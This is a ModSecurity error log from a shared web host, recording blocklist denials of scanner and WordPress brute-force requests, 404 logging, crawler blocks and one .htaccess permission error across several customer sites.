[Tue May 26 15:59:19.990155 2026] [security2:error] [pid 762634:tid 762874] [client 91.238.181.19:55508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV1_7x8rj1VZMqUAOdkbQAAAG4"]
[Tue May 26 15:59:20.306555 2026] [security2:error] [pid 762634:tid 762787] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1_7x8rj1VZMqUAOdkbAAAABc"]
[Tue May 26 15:59:20.948830 2026] [security2:error] [pid 762634:tid 762877] [client 103.44.52.196:58494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ALx8rj1VZMqUAOdkhwAAAHE"]
[Tue May 26 15:59:20.948971 2026] [security2:error] [pid 762634:tid 762877] [client 103.44.52.196:58494] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ALx8rj1VZMqUAOdkhwAAAHE"]
[Tue May 26 15:59:21.357587 2026] [security2:error] [pid 762634:tid 762856] [client 66.84.92.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2Abx8rj1VZMqUAOdkjwAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 15:59:21.375386 2026] [security2:error] [pid 762634:tid 762818] [client 91.238.181.19:55530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Abx8rj1VZMqUAOdklgAAADY"]
[Tue May 26 15:59:21.735253 2026] [security2:error] [pid 762634:tid 762825] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Abx8rj1VZMqUAOdkkgAAAD0"]
[Tue May 26 15:59:22.805031 2026] [security2:error] [pid 762634:tid 762812] [client 66.84.92.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2Arx8rj1VZMqUAOdktQAAADA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1279120&moderation-hash=fa9dcb13d2a0bad3915cfbaf01640185
[Tue May 26 15:59:22.865421 2026] [security2:error] [pid 762634:tid 762764] [client 91.238.181.19:55534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Arx8rj1VZMqUAOdkvAAAAAA"]
[Tue May 26 15:59:24.379831 2026] [security2:error] [pid 762634:tid 762766] [client 91.238.181.19:55554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2BLx8rj1VZMqUAOdk6wAAAAI"]
[Tue May 26 15:59:24.416520 2026] [security2:error] [pid 762634:tid 762874] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2A7x8rj1VZMqUAOdk3wAAAG4"]
[Tue May 26 15:59:25.841360 2026] [security2:error] [pid 762634:tid 762891] [client 91.238.181.19:55560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Bbx8rj1VZMqUAOdlCwAAAH8"]
[Tue May 26 15:59:26.281305 2026] [security2:error] [pid 762634:tid 762806] [client 103.153.130.62:51465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Brx8rj1VZMqUAOdlEAAAACo"]
[Tue May 26 15:59:26.281510 2026] [security2:error] [pid 762634:tid 762806] [client 103.153.130.62:51465] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Brx8rj1VZMqUAOdlEAAAACo"]
[Tue May 26 15:59:26.678306 2026] [security2:error] [pid 762634:tid 762882] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Brx8rj1VZMqUAOdlFgAAAHY"]
[Tue May 26 15:59:27.270697 2026] [security2:error] [pid 762634:tid 762811] [client 91.238.181.19:55574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2B7x8rj1VZMqUAOdlPQAAAC8"]
[Tue May 26 15:59:28.534497 2026] [security2:error] [pid 762634:tid 762712] [remote 193.42.61.12:40224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahV2CLx8rj1VZMqUAOdlXQAACk0"]
[Tue May 26 15:59:28.674876 2026] [security2:error] [pid 762634:tid 762772] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2CLx8rj1VZMqUAOdlVwAAAAg"]
[Tue May 26 15:59:28.715456 2026] [security2:error] [pid 762634:tid 762853] [client 91.238.181.19:55598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2CLx8rj1VZMqUAOdlaAAAAFk"]
[Tue May 26 15:59:28.869218 2026] [security2:error] [pid 762634:tid 762827] [client 193.37.33.159:49977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahV2CLx8rj1VZMqUAOdlYwAAAD8"]
[Tue May 26 15:59:29.200249 2026] [security2:error] [pid 762634:tid 762829] [client 106.219.85.83:18524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Cbx8rj1VZMqUAOdlcAAAAEE"]
[Tue May 26 15:59:29.200376 2026] [security2:error] [pid 762634:tid 762829] [client 106.219.85.83:18524] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Cbx8rj1VZMqUAOdlcAAAAEE"]
[Tue May 26 15:59:30.199607 2026] [security2:error] [pid 762634:tid 762861] [client 91.238.181.19:39898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Crx8rj1VZMqUAOdllAAAAGE"]
[Tue May 26 15:59:30.269658 2026] [security2:error] [pid 762634:tid 762882] [client 146.19.215.7:50776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.215.19.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "senoro.com.mx"] [uri "/wp-includes/core.php"] [unique_id "ahV2Crx8rj1VZMqUAOdllQAAAHY"]
[Tue May 26 15:59:30.498857 2026] [security2:error] [pid 762634:tid 762873] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Crx8rj1VZMqUAOdlkwAAAG0"]
[Tue May 26 15:59:31.624921 2026] [security2:error] [pid 762634:tid 762840] [client 103.44.52.196:56224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2C7x8rj1VZMqUAOdluwAAAEw"]
[Tue May 26 15:59:31.625054 2026] [security2:error] [pid 762634:tid 762840] [client 103.44.52.196:56224] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2C7x8rj1VZMqUAOdluwAAAEw"]
[Tue May 26 15:59:31.642828 2026] [security2:error] [pid 762634:tid 762781] [client 91.238.181.19:39910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2C7x8rj1VZMqUAOdlvAAAABE"]
[Tue May 26 15:59:31.661252 2026] [security2:error] [pid 762634:tid 762714] [remote 5.250.187.247:56380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV2C7x8rj1VZMqUAOdlugAAX08"]
[Tue May 26 15:59:32.798436 2026] [security2:error] [pid 762634:tid 762825] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2DLx8rj1VZMqUAOdlzAAAAD0"]
[Tue May 26 15:59:33.125656 2026] [security2:error] [pid 762634:tid 762793] [client 91.238.181.19:39928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Dbx8rj1VZMqUAOdl3gAAAB0"]
[Tue May 26 15:59:34.541631 2026] [security2:error] [pid 762634:tid 762782] [client 91.238.181.19:39948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Drx8rj1VZMqUAOdmBQAAABI"]
[Tue May 26 15:59:34.707378 2026] [security2:error] [pid 762634:tid 762875] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Drx8rj1VZMqUAOdmAQAAAG8"]
[Tue May 26 15:59:34.963087 2026] [security2:error] [pid 762634:tid 762856] [client 223.123.125.8:65227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 8.125.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Drx8rj1VZMqUAOdmDAAAAFw"]
[Tue May 26 15:59:34.963239 2026] [security2:error] [pid 762634:tid 762856] [client 223.123.125.8:65227] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Drx8rj1VZMqUAOdmDAAAAFw"]
[Tue May 26 15:59:36.050204 2026] [security2:error] [pid 762634:tid 762779] [client 91.238.181.19:39968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2ELx8rj1VZMqUAOdmLgAAAA8"]
[Tue May 26 15:59:36.527670 2026] [security2:error] [pid 762634:tid 762883] [client 103.153.130.62:51748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ELx8rj1VZMqUAOdmPQAAAHc"]
[Tue May 26 15:59:36.527780 2026] [security2:error] [pid 762634:tid 762883] [client 103.153.130.62:51748] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ELx8rj1VZMqUAOdmPQAAAHc"]
[Tue May 26 15:59:36.830058 2026] [security2:error] [pid 762634:tid 762877] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ELx8rj1VZMqUAOdmNwAAAHE"]
[Tue May 26 15:59:37.572057 2026] [security2:error] [pid 762634:tid 762826] [client 91.238.181.19:39974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2Ebx8rj1VZMqUAOdmVAAAAD4"]
[Tue May 26 15:59:38.784012 2026] [security2:error] [pid 762634:tid 762858] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Erx8rj1VZMqUAOdmbgAAAF4"]
[Tue May 26 15:59:39.050420 2026] [security2:error] [pid 762634:tid 762810] [client 91.238.181.19:39980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.181.238.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahV2E7x8rj1VZMqUAOdmhAAAAC4"]
[Tue May 26 15:59:39.293327 2026] [security2:error] [pid 762634:tid 762739] [remote 47.251.53.97:45440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahV2E7x8rj1VZMqUAOdmhQAASWg"]
[Tue May 26 15:59:39.391355 2026] [security2:error] [pid 762634:tid 762887] [client 104.190.213.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Erx8rj1VZMqUAOdmgwAAAHs"]
[Tue May 26 15:59:39.617616 2026] [security2:error] [pid 762634:tid 762775] [client 106.219.85.83:12481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2E7x8rj1VZMqUAOdmmAAAAAs"]
[Tue May 26 15:59:39.617721 2026] [security2:error] [pid 762634:tid 762775] [client 106.219.85.83:12481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2E7x8rj1VZMqUAOdmmAAAAAs"]
[Tue May 26 15:59:40.849959 2026] [security2:error] [pid 762634:tid 762877] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2FLx8rj1VZMqUAOdmvAAAAHE"]
[Tue May 26 15:59:41.206103 2026] [security2:error] [pid 762634:tid 762779] [client 114.119.139.115:36417] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV2Fbx8rj1VZMqUAOdm2gAAAA8"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fmanufacturer%2Finfo&manufacturer_id=11&page=2
[Tue May 26 15:59:42.422694 2026] [security2:error] [pid 762634:tid 762852] [client 103.44.52.196:36552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Frx8rj1VZMqUAOdm8gAAAFg"]
[Tue May 26 15:59:42.422810 2026] [security2:error] [pid 762634:tid 762852] [client 103.44.52.196:36552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Frx8rj1VZMqUAOdm8gAAAFg"]
[Tue May 26 15:59:42.964588 2026] [security2:error] [pid 762634:tid 762834] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Frx8rj1VZMqUAOdm_gAAAEY"]
[Tue May 26 15:59:43.049883 2026] [core:crit] [pid 762634:tid 762826] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:59:44.804268 2026] [security2:error] [pid 762634:tid 762798] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2GLx8rj1VZMqUAOdnOgAAACI"]
[Tue May 26 15:59:46.845936 2026] [security2:error] [pid 762634:tid 762769] [client 103.153.130.62:52019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Grx8rj1VZMqUAOdncwAAAAU"]
[Tue May 26 15:59:46.846083 2026] [security2:error] [pid 762634:tid 762769] [client 103.153.130.62:52019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Grx8rj1VZMqUAOdncwAAAAU"]
[Tue May 26 15:59:47.079267 2026] [security2:error] [pid 762634:tid 762840] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Grx8rj1VZMqUAOdnbAAAAEw"]
[Tue May 26 15:59:47.813766 2026] [security2:error] [pid 762634:tid 762887] [client 114.119.130.18:63017] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/communication-strategies-to-adopt-when-a-crisis-translates-to-the-new-normal/"] [unique_id "ahV2G7x8rj1VZMqUAOdnkgAAAHs"], referer: https://moes-art.com/blog/
[Tue May 26 15:59:49.237089 2026] [security2:error] [pid 762634:tid 762860] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2HLx8rj1VZMqUAOdnrwAAAGA"]
[Tue May 26 15:59:50.237005 2026] [security2:error] [pid 762634:tid 762848] [client 106.219.85.83:18802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Hrx8rj1VZMqUAOdn0AAAAFQ"]
[Tue May 26 15:59:50.237330 2026] [security2:error] [pid 762634:tid 762848] [client 106.219.85.83:18802] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2Hrx8rj1VZMqUAOdn0AAAAFQ"]
[Tue May 26 15:59:50.661855 2026] [security2:error] [pid 762634:tid 762869] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2Hrx8rj1VZMqUAOdn0gAAAGk"]
[Tue May 26 15:59:52.707850 2026] [security2:error] [pid 762634:tid 762816] [client 103.44.52.196:60962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ILx8rj1VZMqUAOdoDgAAADQ"]
[Tue May 26 15:59:52.707948 2026] [security2:error] [pid 762634:tid 762816] [client 103.44.52.196:60962] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ILx8rj1VZMqUAOdoDgAAADQ"]
